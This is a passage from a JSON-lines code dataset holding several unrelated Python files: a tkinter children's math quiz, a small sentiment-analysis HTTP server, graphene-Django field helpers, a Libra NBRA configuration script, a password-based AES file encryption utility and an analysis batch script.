os.path.join(PROJECT_TEMPLATE_PATH, \"gitignore.j2\")\n\nMANIFEST_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"manifest.in.j2\")\n\nPROJECT_INI_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"project.ini.j2\")\n\nREADME_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"readme.markdown.j2\")\n\nREQUIREMENTS_TEMPLATE = os.path.join(PROJECT_TEMPLATE_PATH, \"requirements.pip.j2\")\n","sub_path":"bogeymin/scraps/project/variables.py","file_name":"variables.py","file_ext":"py","file_size_in_byte":2794,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"508496025","text":"#Matthew Lee\r\n#GUI Math Quiz Test v2.2 - 07/03/2021\r\n\r\n#IMPORTS\r\nimport random\r\nfrom tkinter import *\r\nfrom tkinter import Tk\r\n\r\n\r\n#FUNCTIONS\r\nclass Math():\r\n def __init__(self, parent):\r\n self.name = \"\"\r\n self.age = 0\r\n self.result = 0\r\n \r\n \"\"\"Welcome\"\"\"\r\n self.Welcome = Frame(parent)\r\n self.Welcome.grid(row=0, column=0)\r\n \r\n #title\r\n self.TitleLabel = Label(self.Welcome, text = \"Welcome\", \r\n bg = \"light blue\", fg = \"white\", width = 20, padx = 30, \r\n pady = 10, font = (\"comic sans ms\", \"14\", \"bold italic\"))\r\n self.TitleLabel.grid(row = 0, columnspan = 2)\r\n \r\n #Enter name - Label and Enter\r\n self.LabelName = Label(self.Welcome, text = \"Enter Name: \", \r\n fg = \"black\", padx = 5, pady = 5, \r\n font = (\"comic sans ms\", \"10\", \"bold italic\"))\r\n self.LabelName.grid(row = 1, column = 0)\r\n \r\n self.EnterName = Entry(self.Welcome)\r\n self.EnterName.grid(row = 1, column = 1)\r\n \r\n #Enter age - Label and Enter\r\n self.LabelAge = Label(self.Welcome, text = \"Enter Age: \", \r\n fg = \"black\", padx = 5, pady = 5,\r\n font = (\"comic sans ms\", \"10\", \"bold italic\"))\r\n self.LabelAge.grid(row = 2, column = 0)\r\n \r\n self.EnterAge = Entry(self.Welcome)\r\n self.EnterAge.grid(row = 2, column = 1)\r\n \r\n #Return\r\n self.Return = Label(self.Welcome, fg = \"red\",\r\n font = (\"comic sans ms\", \"10\", \"italic\"))\r\n self.Return.grid(row = 3, column = 1)\r\n self.Return.configure(text = \"\") \r\n \r\n #Difficulty Buttons\r\n self.LabelDiff = Label(self.Welcome, text = \"Select difficulty\", \r\n fg = \"black\", padx = 5, pady = 5,\r\n font = (\"comic sans ms\", \"10\", \"bold italic\"))\r\n self.LabelDiff.grid(row = 4, column = 0)\r\n #setup\r\n self.difficulty_list = [\"Easy\", \"Medium\", \"Hard\"]\r\n self.diff_lvl = StringVar()\r\n self.diff_lvl.set(0)\r\n self.diff_btns = []\r\n #Radio button creation\r\n for i in range(len(self.difficulty_list)):\r\n rb = Radiobutton(self.Welcome, variable = self.diff_lvl, value = i,\r\n text = self.difficulty_list[i], anchor = W, padx = 50, width = \"5\", height = \"2\")\r\n self.diff_btns.append(rb)\r\n rb.grid(row = i+5, column = 0, sticky = W)\r\n \r\n #Button to quiz\r\n self.Toquiz = Button(self.Welcome, text = \"Next\", \r\n activebackground = \"yellow\",\r\n command = lambda:[self.UserDetails(), self.QuestionGen()])\r\n self.Toquiz.grid(row = 8, column = 0)\r\n \r\n \r\n \"\"\"Quiz\"\"\"\r\n #set score\r\n global score\r\n global count\r\n \r\n score = 0\r\n count = 0\r\n \r\n self.Quiz = Frame(parent)\r\n #Title Banner\r\n self.TitleQuiz = Label(self.Quiz, text = \"Question 1 \\nScore: 0/5\", \r\n bg = \"light blue\", fg = \"white\", width = 20, padx = 30, \r\n pady = 10, font = (\"comic sans ms\", \"14\", \"bold italic\"))\r\n self.TitleQuiz.grid(row = 0, columnspan = 2)\r\n \r\n #Question\r\n self.Question = Label(self.Quiz, padx = 5, pady = 5, font = (\"comic sans ms\", \"10\"))\r\n self.Question.grid(row = 1, column = 0)\r\n \r\n #Answer box\r\n self.AnswerBox = Entry(self.Quiz)\r\n self.AnswerBox.grid(row = 1, column = 1)\r\n \r\n #Check Answer box\r\n self.ButtonCheck = Button(self.Quiz, text = \"Check Answer\",\r\n activebackground = \"yellow\",\r\n command = lambda:[self.Check()])\r\n self.ButtonCheck.grid(row = 2, column = 0)\r\n \r\n #Feedback\r\n self.feedback = Label(self.Quiz, padx = 5, pady = 5, font = (\"comic sans ms\", \"10\"))\r\n self.feedback.grid(row = 2, column = 1)\r\n \r\n \r\n \r\n \"\"\"Score\"\"\"\r\n self.Score_page = Frame(parent)\r\n #Title\r\n self.TitleScore = Label(self.Score_page, text = \"YOUR SCORE\", \r\n bg = \"light blue\", fg = \"white\", width = 20, padx = 30, \r\n pady = 10, font = (\"comic sans ms\", \"14\", \"bold italic\"))\r\n self.TitleScore.grid(row = 0, columnspan = 4)\r\n \r\n #Report\r\n Report_info = [\"Name\", \"Age\", \"Score\"]\r\n self.report_labels = []\r\n \r\n for i in range(len(Report_info)):\r\n ColumnHeading = Label(self.Score_page, text = Report_info[i], \r\n width = \"7\", height = \"2\", font = (\"comic sans ms\", \"14\", \"bold\"))\r\n self.report_labels.append(ColumnHeading)\r\n ColumnHeading.grid(row = 1, column = i)\r\n \r\n #User Details \r\n self.name_display = Label(self.Score_page, textvariable = self.name)\r\n self.name_display.grid(row = 2, column = 0)\r\n \r\n self.age_display = Label(self.Score_page, text = \"\")\r\n self.age_display.grid(row = 2, column = 1)\r\n \r\n self.result_display = Label(self.Score_page, text = \"\")\r\n self.result_display.grid(row = 2, column = 2)\r\n \r\n #Home Button\r\n self.ButtonHome = Button(self.Score_page, text = \"Home\",\r\n activebackground = \"yellow\", command = lambda:[self.ShowWelcome()])\r\n self.ButtonHome.grid(row = 3, column = 0) \r\n \r\n \r\n \r\n \"\"\"FUNCTIONS\"\"\" \r\n def End(self):\r\n #Should run when count reaches 5\r\n self.Quiz.grid_remove()\r\n \r\n self.name_display.configure(text = self.name)\r\n self.age_display.configure(text = self.age)\r\n self.result_display.configure(text = self.result)\r\n \r\n #Open score page\r\n self.Score_page.grid()\r\n \r\n def ShowQuiz(self):\r\n #Removes Welcome and plays \r\n self.Welcome.grid_remove()\r\n self.Quiz.grid()\r\n \r\n def ShowWelcome(self):\r\n #Clears user details for next user\r\n self.EnterName.delete(0, 'end')\r\n self.EnterAge.delete(0, 'end')\r\n #Removes Quiz and shows welcome\r\n self.Score_page.grid_remove()\r\n self.Welcome.grid()\r\n \r\n def UserDetails(self):\r\n #Check age\r\n if self.EnterName.get() == \"\":\r\n self.Return.configure(text = \"Please enter \\nyour name!\")\r\n else:\r\n try:\r\n if int(self.EnterAge.get()) <= 5:\r\n self.Return.configure(text = \"You're too young!\")\r\n elif int(self.EnterAge.get()) >= 16:\r\n self.Return.configure(text = \"You're too old!\")\r\n else:\r\n self.ShowQuiz()\r\n except ValueError:\r\n self.Return.configure(text = \"Please enter your \\nage in numbers\") \r\n \r\n \r\n def QuestionGen(self):\r\n #Generate questions\r\n #list\r\n num_list = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\r\n #Picks numbers\r\n self.number_1 = random.choice(num_list)\r\n self.number_2 = random.choice(num_list)\r\n self.total = self.number_1 + self.number_2\r\n self.add = self.number_1, \"+\", self.number_2, \"=\"\r\n #config\r\n self.Question.configure(text = self.add)\r\n \r\n def Check(self):\r\n global score\r\n global count\r\n try:\r\n self.answer = self.AnswerBox.get()\r\n self.answer_mod = int(self.answer)\r\n #Clears\r\n self.AnswerBox.delete(0, 'end')\r\n if self.answer_mod == self.total:\r\n self.feedback.configure(text = \"Correct!\")\r\n #Adds\r\n score += 1\r\n count += 1\r\n self.TitleQuiz.configure(text = \"Question {} \\nScore: {}/5\".format(count + 1, score))\r\n #Question count check\r\n if count == 5:\r\n #Collect Info\r\n self.name = self.EnterName.get()\r\n self.age = str(self.EnterAge.get())\r\n self.result = str(score)\r\n #reset\r\n score = 0\r\n count = 0\r\n self.End() \r\n else:\r\n self.QuestionGen()\r\n else:\r\n self.feedback.configure(text = \"Incorrect!\")\r\n count += 1\r\n self.TitleQuiz.configure(text = \"Question {} \\nScore: {}/5\".format(count + 1, score))\r\n if count == 5:\r\n #Collect Info\r\n self.name = self.EnterName.get()\r\n self.age = str(self.EnterAge.get())\r\n self.result = str(score)\r\n #reset\r\n score = 0\r\n count = 0 \r\n self.End() \r\n else:\r\n self.QuestionGen()\r\n except ValueError:\r\n self.feedback.configure(text = \"Please enter \\na number\")\r\n \r\n \r\n\"\"\"MAINLOOP\"\"\" \r\n#Begin code\r\nif __name__ == \"__main__\":\r\n root = Tk()\r\n frames = Math(root)\r\n root.title(\"Math quiz\")\r\n root.mainloop() ","sub_path":"GUI Math Quiz Test V2.3_Fixing loop (clear count and score).py","file_name":"GUI Math Quiz Test V2.3_Fixing loop (clear count and score).py","file_ext":"py","file_size_in_byte":9568,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"530237301","text":"from http.server import BaseHTTPRequestHandler, HTTPServer\nimport json\nimport config\nimport sentimentAnalyze\nimport os\n\nclass SimpleHTTP(BaseHTTPRequestHandler):\n # Nhận GET request gửi lên.\n def _set_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.end_headers()\n\n def _set_cors_headers(self):\n self.send_response(200)\n self.send_header('Content-type', 'text/html')\n self.send_header('Access-Control-Allow-Origin', '*')\n self.send_header('Access-Control-Allow-Methods', 'GET, POST, OPTIONS')\n self.send_header(\"Access-Control-Allow-Headers\", \"Content-Type\")\n self.end_headers()\n\n def do_GET(self):\n self._set_headers()\n html = open(\"./client.html\")\n html = html.read()\n html = html.replace(\" < -- host -- >\",\n '%s:%s' % (config.server_ip, int(os.environ.get(\"PORT\", config.server_port))))\n # message = website\n # message = \"\"\"\n # \n #

Hello World!

\n # \"\"\"\n self.wfile.write(str.encode(html))\n # self.wfile.write(bytes(message, \"utf8\"))\n\n def do_HEAD(self):\n self._set_headers()\n\n def do_POST(self):\n # Doesn't do anything with posted data\n # self._set_headers()\n # load database\n self._set_cors_headers()\n self.data_string = self.rfile.read(int(self.headers['Content-Length']))\n data = self.data_string.decode(\"utf-8\")\n # parse to json object\n obj = json.loads(data)\n\n # get data in setence field\n sentence = obj[\"sentence\"]\n commentId = \"\"\n if \"commentId\" in obj and obj[\"commentId\"] != None:\n commentId = obj[\"commentId\"]\n print(\"receive : \",sentence, '- commentid : ', commentId)\n\n res = sentimentAnalyze.processing(sentence, commentId)\n # convert res to bytes\n res = str.encode(res)\n self.wfile.write(res)\n\n def do_OPTIONS(self):\n self._set_cors_headers()\n\n\ndef startServer(server_address):\n # server_address = ('127.0.0.1', 3333)\n # cấu hình host và cổng port cho server\n\n # Khởi tạo server với thông số cấu hình ở trên.\n httpd = HTTPServer(server_address, SimpleHTTP)\n\n print(\"Starting server\", server_address)\n\n # Tiến hành chạy server\n httpd.serve_forever()\n\n\n# server_address = (config.server_ip, config.server_port)\nserver_address = (config.server_ip, int(os.environ.get(\"PORT\", config.server_port)))\nstartServer(server_address)","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":2631,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"602983967","text":"from django.db import models\n\nfrom ...core.types import Integer\nfrom ...core.types import Float\nfrom ...core.types import Boolean\nfrom ...core.types import String\nfrom ...core.types import List\nfrom ...core.types import NonNull\nfrom ...core.types import Field as VanillaField\nfrom ...core.types import FieldKernel as VanillaFieldKernel\nfrom .exceptions import NotAuthenticated\n\n\n# Helper functions\ndef create_field(field):\n\t\"\"\"\n\tTurns a Django field into the corresponding type of Graphene field.\n\t\"\"\"\n\tif field.__class__ is models.AutoField:\n\t\treturn field.name, Field(Integer.NonNull)\n\telif field.__class__ is models.IntegerField:\n\t\treturn field.name, Field(Integer if field.null else Integer.NonNull)\n\telif field.__class__ is models.FloatField:\n\t\treturn field.name, Field(Float if field.null else Float.NonNull)\n\telif field.__class__ is models.BooleanField:\n\t\treturn field.name, Field(Boolean if field.null else Boolean.NonNull)\n\telif field.__class__ is models.CharField:\n\t\treturn field.name, Field(String if field.null or field.blank else String.NonNull)\n\telif field.__class__ is models.ManyToOneRel:\n\t\treturn field.get_accessor_name(), OneToManyField(field)\n\telif field.__class__ is models.ForeignKey:\n\t\treturn field.name, ManyToOneField(field)\n\telse:\n\t\treturn field.name, None\n\n\n\n# Field kernel/shell\nclass FieldKernel(VanillaFieldKernel):\n\tdef check_permissions(self, root, user, method=''):\n\t\t\"\"\"\n\t\tEnsures that at least one of the model's permission classes will pass\n\t\tfor the given user.\n\t\t\"\"\"\n\t\tself.check_permissions_for_type(self.type, root, user, method)\n\t\t\n\tdef check_permissions_for_type(self, type, root, user, method):\n\t\tif type.__class__ in (NonNull, List):\n\t\t\tself.check_permissions_for_type(type._kernel.type, root, user, method)\n\t\telif hasattr(type._meta, 'permissions'):\n\t\t\tif (type._meta.permissions and\n\t\t\t\tnot any(x.has_permission(user, method=method) for x in type._meta.permissions)):\n\t\t\t\traise NotAuthenticated()\n\t\t\tfor selection in root.selection_set.selections:\n\t\t\t\tfield = type._kernel.fields.get(selection.name.value)\n\t\t\t\tif field:\n\t\t\t\t\tfield._kernel.check_permissions(selection, user, method=method)\n\n\n\n\tdef get_resolver_args(self, root):\n\t\t\"\"\"\n\t\tCompiles a list of fields that Django should prefetch when it fetches\n\t\tthe queryset for one of the top-level fields.\n\t\t\"\"\"\n\t\treturn self.get_resolver_args_for_type(self.type, root)\n\n\tdef get_resolver_args_for_type(self, type, root):\n\t\tif type.__class__ in (NonNull, List):\n\t\t\treturn self.get_resolver_args_for_type(type._kernel.type, root)\n\t\telif hasattr(type._kernel, 'fields'):\n\t\t\tselections = { x.name.value:x for x in root.selection_set.selections }\n\t\t\tfields = { k:type._kernel.fields.get(k) for k,v in selections.items() if type._kernel.fields.get(k) }\n\t\t\t\n\t\t\tmany_to_one = [ k for k,v in fields.items() if v.__class__ is ManyToOneField ]\n\t\t\tone_to_many = [ k for k,v in fields.items() if v.__class__ is OneToManyField ]\n\n\t\t\tfor k,v in fields.items():\n\t\t\t\targs = v._kernel.get_resolver_args(selections[k]) or {}\n\t\t\t\tmany_to_one += ['{}__{}'.format(k, x) for x in args.get('ManyToOne', [])]\n\t\t\t\tone_to_many += ['{}__{}'.format(k, x) for x in args.get('OneToMany', [])]\n\n\t\t\treturn {\n\t\t\t\t'ManyToOne': many_to_one,\n\t\t\t\t'OneToMany': one_to_many,\n\t\t\t}\n\nclass Field(VanillaField):\n\t__kernel__ = FieldKernel\n\n\tdef default_resolver(self):\n\t\tdef resolve_model_attribute(model):\n\t\t\ttry:\n\t\t\t\treturn getattr(model._source, self._kernel.name)\n\t\t\texcept KeyError:\n\t\t\t\traise ValueError(\"Field '{}' has no state and no resolve function\".format(self._kernel.name))\n\t\t\n\t\treturn resolve_model_attribute\n\n\n\n# Relational fields\nclass OneToManyField(Field):\n\tdef __init__(self, field, *args, **kwargs):\n\t\tmodel = kwargs.pop('model', None) or field.related_model\n\t\tkwargs['resolve'] = self.default_resolver()\n\t\tsuper(OneToManyField, self).__init__(NonNull(List(lambda: model.get_graphene_model())), *args, **kwargs)\n\t\tself._kernel.django_field = field\n\n\tdef default_resolver(self):\n\t\tdef resolve_one_to_many(model):\n\t\t\tgraphene_model = self._kernel.django_field.related_model.get_graphene_model()\n\t\t\tfield = getattr(model._source, self._kernel.django_field.get_accessor_name())\n\t\t\treturn [graphene_model(x) for x in field.all()]\n\t\t\n\t\treturn resolve_one_to_many\n\nclass ManyToOneField(Field):\n\tdef __init__(self, field, *args, **kwargs):\n\t\tmodel = kwargs.pop('model', None) or field.related_model\n\t\tkwargs['resolve'] = self.default_resolver()\n\t\tsuper(ManyToOneField, self).__init__(lambda: model.get_graphene_model(), *args, **kwargs)\n\t\tself._kernel.django_field = field\n\n\tdef default_resolver(self):\n\t\tdef resolve_many_to_one(model):\n\t\t\ttype = self._kernel.django_field.related_model.get_graphene_model()\n\t\t\treturn type(getattr(model._source, self._kernel.django_field.name))\n\n\t\treturn resolve_many_to_one\n","sub_path":"graphene/contrib/django/fields.py","file_name":"fields.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"86676630","text":"import os\nimport sys\nimport time\nfrom liblibra_core import *\nfrom libra_py.workflows.nbra import step3\n\n# For excited states - Computing the excited states SDs and their overlaps and NACs\nparams_sd = {\n 'lowest_orbital': 12800-100, 'highest_orbital': 12800+1000,\n 'num_occ_states': 10, 'num_unocc_states': 10,\n 'isUKS': 0, 'number_of_states': 10, 'tolerance': 0.01, 'verbosity': 0, \n 'use_multiprocessing': True, 'nprocs': 12, \n 'is_many_body': False, 'time_step': 1.0, 'es_software': 'cp2k',\n 'path_to_npz_files': os.getcwd()+'/../../2_overlaps/10x10/res',\n 'logfile_directory': os.getcwd()+'/../../2_overlaps/10x10/all_logfiles',\n 'path_to_save_sd_Hvibs': os.getcwd()+'/res-mixed-basis-raw-ordered-identity',\n 'outdir': os.getcwd()+'/res-mixed-basis-raw-ordered-identity',\n 'start_time': 900, 'finish_time': 3099, 'sorting_type': 'identity',\n 'apply_phase_correction': True, 'apply_orthonormalization': True,\n 'do_state_reordering': 2, 'state_reordering_alpha':0\n }\n\nstep3.run_step3_sd_nacs_libint(params_sd)\n\n","sub_path":"3_nacs/10x10/step3.py","file_name":"step3.py","file_ext":"py","file_size_in_byte":1128,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"353949813","text":"#! /usr/bin/env python3\n#NoGuiLinux\n\nimport json,random,os,base64,argparse,shutil,stat\ntry:\n from Cryptodome.Cipher import AES\nexcept:\n from Crypto.Cipher import AES\n\nclass Zero:\n def __init__(self):\n pass\n\n def encrypt(self,chunk,key,num,msg):\n cipher=AES.new(key,AES.MODE_EAX)\n nonce=cipher.nonce\n ciphertext,tag=cipher.encrypt_and_digest(chunk)\n #nonce,tag,len(ciphertext),data\n print(msg,'nonce: {}'.format(len(nonce)),'dataLen: {}'.format(len(ciphertext)),'tag: {}'.format(len(tag)),'chunk: {}'.format(num))\n return nonce,tag,len(ciphertext),key,ciphertext\n\n def jsonHandlerE_chunk(self,dataTuple):\n export={\n 'key':'',\n 'nonce':'',\n 'tag':'',\n 'len':0,\n }\n if len(dataTuple) == 5:\n export['key']=base64.b64encode(dataTuple[3]).decode()\n export['nonce']=base64.b64encode(dataTuple[0]).decode()\n export['tag']=base64.b64encode(dataTuple[1]).decode()\n export['len']=dataTuple[2]\n return export\n\n def randomKey(self):\n return os.urandom(32)\n\n def simpleRunE(self,key,datafile,eDatafile,keyfile,eKeyfile):\n if self.exists(datafile) == None:\n return None\n keyseg={}\n data={}\n num=0\n with open(eDatafile,'wb') as df:\n with open(datafile,'rb') as pt:\n while True:\n msg=pt.read(random.randint(8,1024))\n if not msg:\n break\n #for num,i in enumerate(msg):\n data=self.encrypt(msg,self.randomKey(),num,'{} -> {}'.format(datafile,eDatafile))\n keyseg[str(num)]=self.jsonHandlerE_chunk(data)\n df.write(data[-1])\n num+=1\n \n with open(keyfile,'w') as kf:\n json.dump(keyseg,kf) \n\n self.encrypt_key(key,keyfile,eKeyfile)\n os.remove(datafile)\n return True\n\n def encrypt_key(self,key,keyfile,eKeyfile):\n num=0\n with open(eKeyfile,'wb') as ekf:\n with open(keyfile,'rb') as kf:\n while True:\n d=kf.read(128)\n if not d:\n break\n res=self.encrypt(d,key,num,'{} -> {}'.format(keyfile,eKeyfile))\n ctext=res[0]+res[-1]+res[1]\n print('ctext: {}'.format(len(ctext)),'nonce {}'.format(len(res[0])),'data {}'.format(len(res[-1])),'tag {}'.format(len(res[1])))\n ekf.write(ctext)\n num+=1\n os.remove(keyfile)\n\n def decrypt_key(self,key,keyfile,eKeyfile):\n count=0\n with open(eKeyfile,'rb') as ekf, open(keyfile,'wb') as kf2:\n while True:\n d=ekf.read(16+128+16)\n if not d:\n break\n com={}\n com['nonce']=base64.b64encode(d[:16]).decode()\n if len(d) != (16+128+16):\n chunk=d[16:len(d)-16]\n else:\n chunk=d[16:128+16]\n com['tag']=base64.b64encode(d[128+16:]).decode()\n com['key']=base64.b64encode(key).decode()\n res=self.decrypt(chunk,com,'{} -> {} : chunk {}'.format(eKeyfile,keyfile,count))\n kf2.write(res)\n count+=1\n os.remove(eKeyfile)\n\n def exists(self,name):\n if not os.path.exists(name):\n print('{} : does not exist'.format(name))\n return None\n elif not os.path.isfile(name):\n print('{} : not a file'.format(name))\n return None\n else:\n return True\n\n def simpleRunD(self,key,datafile,eDatafile,keyfile,eKeyfile): \n if self.exists(eDatafile) == None:\n return None\n\n self.decrypt_key(key,keyfile,eKeyfile)\n keyseg={}\n\n with open(datafile,'wb') as pt:\n with open(keyfile,'r') as kf:\n keyseg=json.load(kf)\n with open(eDatafile,'rb') as df:\n for i in keyseg.keys():\n chunk=df.read(int(keyseg[i]['len']))\n res=self.decrypt(chunk,keyseg[i],'{} -> {} : chunk {}'.format(eDatafile,datafile,i))\n pt.write(res)\n for i in [keyfile,eDatafile]:\n os.remove(i)\n\n return True\n \n def decrypt(self,chunk,dataDict,msg):\n nonce=base64.b64decode(dataDict['nonce'])\n tag=base64.b64decode(dataDict['tag'])\n key=base64.b64decode(dataDict['key'])\n cipher=AES.new(key,mode=AES.MODE_EAX,nonce=nonce)\n plaintext=cipher.decrypt(chunk)\n try:\n cipher.verify(tag)\n print('all good!',msg)\n except ValueError:\n print('chunk may be corrupted, or compromised!',msg)\n return plaintext\n def fixKey(self,key):\n try:\n if type(key) == type(str()):\n key=key.encode()\n if len(key) < 32:\n key=key+b' '*(32-len(key))\n elif len(key) > 32:\n print('warning: key is longer than supported (32 chars)... truncating to 32')\n key=key[:32]\n return key\n except:\n print('ERROR! \"{}\"'.format(key))\n return None\n\nclass Roland:\n #cmdline utility class\n #if claptrap.py is not imported as a module\n modes=['enc','dec']\n tmpdir='.tmp'\n def __init__(self):\n self.tmpdir=os.path.join(os.environ['HOME'],self.tmpdir)\n\n def cmdline(self):\n parser=argparse.ArgumentParser()\n args={\n 'datafile':{'short':'-d','long':'--datafile','help':'unencrypted data file','req':'yes'},\n 'edatafile':{'short':'-e','long':'--eDatafile','help':'encrypted data file','req':'yes'},\n 'keyfile':{'short':'-k','long':'--keyfile','help':'file containing keys to eDatafile','req':'yes'},\n 'password':{'short':'-p','long':'--password','help':'passwork to lock keyfile','req':'yes'},\n 'mode':{'short':'-m','long':'--mode','help':'dec or enc','req':'yes'},\n }\n for key in args.keys():\n parser.add_argument(args[key]['short'],args[key]['long'],help=args[key]['help'],required=args[key]['req'])\n\n options=parser.parse_args()\n return options\n\n def mkkeynames(self,keyfile,mode):\n kf=os.path.join(self.tmpdir,os.path.basename(keyfile)+'_tmp.json')\n ekf=os.path.join(self.tmpdir,os.path.basename(keyfile)+'_tmp.eJson')\n if os.path.exists(self.tmpdir):\n shutil.rmtree(self.tmpdir)\n os.mkdir(self.tmpdir)\n if mode == 'dec':\n if not os.path.exists(keyfile):\n print('keyfile does not exist')\n return None\n \n if not os.path.isfile(keyfile):\n print('keyfile is not a file')\n return None\n\n with open(keyfile,'rb') as kfp, open(ekf,'wb') as ekfp:\n while True:\n d=kfp.read(512)\n if not d:\n break\n ekfp.write(d)\n return kf,ekf\n elif mode == 'enc':\n return kf,keyfile\n\n def permissions_read(self,name):\n d=os.path.dirname(name)\n if d == '':\n d='.'\n if not os.path.exists(d):\n return False,'{} : does not exist!'.format(d)\n\n uid=os.getuid()\n if uid == 0:\n return True,''\n gid=os.getgid()\n\n st=os.stat(d)\n if uid == st.st_uid:\n status=bool(st.st_mode & stat.S_IRUSR)\n else:\n status=False\n if status == False:\n status=bool(st.st_mode & stat.S_IRGRP)\n if status == False:\n status=bool(st.st_mode & stat.S_IROTH)\n return status,''\n\n def permissions_write(self,name):\n d=os.path.dirname(name)\n if d == '':\n d='.'\n if not os.path.exists(d):\n return False,'{} : does not exist!'.format(d)\n uid=os.getuid()\n if uid == 0:\n return True,''\n gid=os.getgid()\n\n st=os.stat(d)\n if uid == st.st_uid:\n status=bool(st.st_mode & stat.S_IWUSR)\n else:\n status=False\n if status == False:\n status=bool(st.st_mode & stat.S_IWGRP)\n if status == False:\n status=bool(st.st_mode & stat.S_IWOTH)\n return status,''\n\n def ops(self):\n zero=Zero()\n options=self.cmdline()\n if options.mode in self.modes:\n options.datafile=os.path.expanduser(options.datafile)\n options.eDatafile=os.path.expanduser(options.eDatafile)\n options.keyfile=os.path.expanduser(options.keyfile)\n #check to see if user can read/write to locations above\n checks=[\n [options.keyfile,self.permissions_read],\n [options.keyfile,self.permissions_write],\n [options.datafile,self.permissions_read],\n [options.datafile,self.permissions_write],\n [options.eDatafile,self.permissions_read],\n [options.eDatafile,self.permissions_write],\n ]\n for name,call in checks:\n result=call(name)\n if result[0] == False:\n if result[1] == '':\n print('permissions might not permit operation! aborting! {} : {}'.format(name,result[0]))\n else:\n print(result[1])\n return None\n\n if options.mode == 'enc':\n ks=self.mkkeynames(options.keyfile,'enc')\n keyfile=ks[0]\n eKeyfile=ks[1]\n key=zero.fixKey(options.password)\n if key != None:\n stat=zero.simpleRunE(key,options.datafile,options.eDatafile,keyfile,eKeyfile)\n elif options.mode == 'dec':\n ks=self.mkkeynames(options.keyfile,'dec')\n if ks != None:\n keyfile=ks[0]\n eKeyfile=ks[1]\n key=zero.fixKey(options.password)\n if key != None:\n stat=zero.simpleRunD(key,options.datafile,options.eDatafile,keyfile,eKeyfile)\n if stat == True:\n try:\n os.remove(options.keyfile)\n except OSError as err:\n print('whoopsie! looks like you can\\'t delete the keyfile!\\n',err)\n shutil.rmtree(self.tmpdir)\n else:\n print('use \"dec\" or \"enc\"!')\n\nif __name__ == '__main__':\n commander=Roland()\n commander.ops()\n","sub_path":"claptrap/claptrap.py","file_name":"claptrap.py","file_ext":"py","file_size_in_byte":10943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"61"} +{"seq_id":"646129796","text":"import glob\nimport json\n\nfrom sys import argv, exit\nfrom os import makedirs, path, unlink\nfrom shutil import copytree, copy, rmtree\nimport subprocess\nimport os\n\n\ndef sortKeyFunc(s):\n return int(os.path.basename(s)[8:-5])\n\ndef main():\n\n try:\n # set parameters\n Low = int(argv[1]) \n High = int(argv[2])\n jobFolder = str(argv[3])\n\n except:\n print('Didnt set number of files or jobs!')\n exit()\n\n ###############################\n # SET PATHS and load HYDRO DATA\n\n CONF = json.load(open(\"Configure.json\", \"r\"))\n WORKING_FOLDER = CONF[\"workingFolder\"]\n ALICE_DATA_PATH = CONF[\"aliceFolder\"]\n\n PT = ALICE_DATA_PATH + \"/fullPtRange.json\"\n\n workFolderPion = WORKING_FOLDER + \"/interpolation/JOBS/\" + jobFolder + \"/pion/\" \n workFolderKaon = WORKING_FOLDER + \"/interpolation/JOBS/\" + jobFolder + \"/kaon/\" \n workFolderProton = WORKING_FOLDER + \"/interpolation/JOBS/\" + jobFolder + \"/proton/\" \n\n # LOAD GRID DATA\n SpectraPathPion = glob.glob(WORKING_FOLDER + \"/JOBS/job-*/pion/spectra_*\")\n SpectraPathKaon = glob.glob(WORKING_FOLDER + \"/JOBS/job-*/kaon/spectra_*\")\n SpectraPathProton = glob.glob(WORKING_FOLDER + \"/JOBS/job-*/proton/spectra_*\")\n\n ###############################\n # load Alice DATA \n\n PionAlicePT = ALICE_DATA_PATH + \"/pion/pt_pi0139plu.json\"\n KaonAlicePT = ALICE_DATA_PATH + \"/kaon/pt_Ka0492plu.json\"\n ProtonAlicePT = ALICE_DATA_PATH + \"/proton/pt_pr0938plu.json\"\n\n ###############################\n # Sort ascending 1,2,3...\n\n SpectraPathPion.sort(key=sortKeyFunc)\n SpectraPathKaon.sort(key=sortKeyFunc)\n SpectraPathProton.sort(key=sortKeyFunc)\n\n FILES1 = SpectraPathPion[Low-1:High]\n FILES2 = SpectraPathKaon[Low-1:High]\n FILES3 = SpectraPathProton[Low-1:High]\n\n ################################\n # MACROS commands\n\n graph = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/graph/make_graph.py \"\n fit = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/fit/make_fit.py \"\n chi = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/chi/make_chi_square_batch_05.py \" + WORKING_FOLDER + \" \"\n writeToTree = \"python \" + WORKING_FOLDER + \"/interpolation/MACROS/chi/write_to_tree_05.py \" + WORKING_FOLDER + \"/interpolation/JOBS/ \" + jobFolder\n\n\n for iFile in FILES1:\n\n GraphFile = workFolderPion + \"graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".root\"\n EvalGraphFile = workFolderPion + \"eval_fit_graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".json\"\n\n commandGraph = graph + workFolderPion + \" \" + PT + \" \" + iFile + \" -b\" # the iFile gives the index in output\n commandFit = fit + workFolderPion + \" \" + GraphFile + \" \" + PionAlicePT + \" -b\"\n commandCHI = chi + workFolderPion + \" \" + str(1) + \" \" + EvalGraphFile + \" \" + iFile + \" -b\" # 1 = PION\n \n os.system(commandGraph) \n os.system(commandFit) \n os.system(commandCHI) \n\n os.system(writeToTree + \" pion\") \n \n for iFile in FILES2:\n\n GraphFile = workFolderKaon + \"graph_\" + iFile.rsplit('/', 1)[1].split(\".\")[0] + \".root\"\n EvalGraphFile = workFolderKaon + \"eval_fit_graph_\" + iFile.rsplit('/', 